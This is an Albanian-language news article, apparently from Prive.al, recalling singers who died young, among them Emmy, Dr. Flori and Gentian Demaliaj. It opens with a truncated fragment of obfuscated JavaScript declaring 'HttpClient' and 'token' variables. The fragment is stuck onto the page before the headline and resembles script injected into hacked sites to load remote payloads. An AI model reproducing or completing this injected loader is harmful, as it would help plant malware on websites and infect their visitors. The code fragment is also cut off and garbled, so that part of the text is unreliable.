;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

KËNGËTARËT QË NDËRRUAN JETË TË RINJ!

By

Artistët janë personat më të dashur nga publiku e sidomos këngëtarët të cilët bëhen pjesë e përditshmërisë sonë përmes muzikës që prodhojnë.

Mirëpo përpos hiteve, muzika shqiptare është prekur edhe me ndarje të parakohshme nga jeta e disa këngëtarëve.

Kombi shqiptar u shokua nga vdekja në moshë  shumë të re të këngëtares Emmy. Këngëtarja e ‘Rastësisht u pamë’  ndërroi jetë në moshën 21 vjeçare me datë 28 Shkurt 2011.

Elsina Hidersha (emri i plotë i këngëtares) sipas deklaratës së Prokurorisë atë kohë u vra nga pakujdesia pas një zënke që ka pasur me ish të dashurin.

Vdekja e këngëtares pikëlloi të gjithë e sidomos ata që ishin afër saj. Elvana Gjata i kushtoi këngën ‘Me ty’, me të cilin fitoi në festivalin e muzikës moderne ‘Top Fest’.

Një tjetër ndarje nga jeta që shokoi shqiptarët, është ajo e reperit dhe producentit Dr. Flori.  Gjashtë muaj më parë, përkatësisht me datë 17 Nëntor 2014 u kumtua lajmi se Florian Kondi ndërroi jetë në moshën 35 vjeçare.

Arsyet e vdekjes së tij u konstatua mbidoza nga kokaina.

Këngëtari Florian Kondi, i lindur më 28 shkurt të vitit 1979 në Tiranë, la pas dy fëmijë, një vajzë dhe një djalë (i cili akoma nuk ka mbushur një vjet).

Në moshën 40 vjeçare nga jeta u nda edhe vokalisti i grupit ‘Djemtë e detit’, Gentian Demaliaj.  Këngëtari ndërroi jetë me datë 27 Janar 2015 pasi vuante prej kohësh nga tumori.

Në vitin 2013 ai u diagnostikua me kancer dhe që atëherë ai bënte vazhdimisht kimioterapi në Tiranë dhe Itali. Po në vitin 2013, më 10 prill me vendim të Këshillit të Ministrave u akordua edhe një fond i veçantë për këngëtarin e njohur për një kurim më të specializuar jashtë shtetit.

Aktualisht,vajza e tij Edea po merr pjesë në programin e talenteve ‘X Factor Albania’ dhe në paraqitjen e parë në Netët Live i kushtoi këngën babait të saj.

Edhe pse ndërruan jetë shumë të rinj, veprat e tyre do i mbajnë përgjithmonë në jetë./Prive.al

Artikuj të ngjashëm